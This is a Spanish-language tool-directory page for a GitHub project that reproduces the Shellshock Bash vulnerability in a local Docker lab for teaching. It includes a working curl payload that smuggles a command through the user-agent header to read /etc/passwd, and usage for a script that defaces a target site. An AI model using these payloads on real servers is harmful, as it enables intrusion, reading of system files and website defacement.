Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-6271 — Proyecto de presentación de un CVE (ShellShock) con pdf, demostración técnica y reproducible | Kitploit
Herramientas/GitHubGitHub/radyio/cve-2014-6271
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubradyio/cve-2014-6271

CVE-2014-6271

Proyecto de presentación de un CVE (ShellShock) con pdf, demostración técnica y reproducible

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2014-6271

Descripción

Este proyecto permite reproducir la vulnerabilidad CVE-2014-6271, también conocida como Shellshock. Shellshock es una vulnerabilidad de seguridad en Bash que permite ejecutar código malicioso a través de variables de entorno.

El objetivo de este proyecto es demostrar el impacto de esta vulnerabilidad en un entorno Docker.

Requisitos previos

Antes de comenzar, asegúrese de tener Docker instalado en su máquina. Puede descargar Docker aquí.

Instalación y ejecución

1. Construir la imagen Docker

En el directorio del proyecto, construya la imagen Docker ejecutando el siguiente comando :

root@kitploit:~
docker build -t ['image name'] .

Reemplace ['image name'] por el nombre que desee darle a la imagen Docker.

2. Ejecutar el contenedor Docker

Una vez construida la imagen, ejecute un contenedor a partir de esa imagen con el siguiente comando :

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

Esto expondrá el servicio en el puerto 8080 de su máquina local.

3. Acceder a la aplicación

Abra su navegador y acceda a http://localhost:8080. Podrá observar el comportamiento de la aplicación y probar la vulnerabilidad.

4-1. Explotar la vulnerabilidad

En otra terminal, ejecute el siguiente comando para explotar la vulnerabilidad y leer el contenido del archivo /etc/passwd :

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Este comando envía un encabezado user-agent especialmente diseñado para explotar Shellshock. Si la vulnerabilidad se reproduce correctamente, el contenido de /etc/passwd se mostrará en la salida de la terminal.

4-2. Explotar la vulnerabilidad (script exp_deface.sh)

Este script permite explotar la vulnerabilidad para defacear una página web objetivo. La vulnerabilidad se basa en una mala configuración de scripts CGI, que permite la ejecución de comandos arbitrarios en el servidor.

Requisitos previos : Asegúrese de que el objetivo sea vulnerable al bug ShellShock. Asegúrese de tener los permisos necesarios para probar el exploit en ese objetivo.

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

Seguridad

Importante: Esta vulnerabilidad solo debe utilizarse con fines de prueba y demostración en un entorno controlado. No utilice este proyecto en entornos de producción.

Descargar herramienta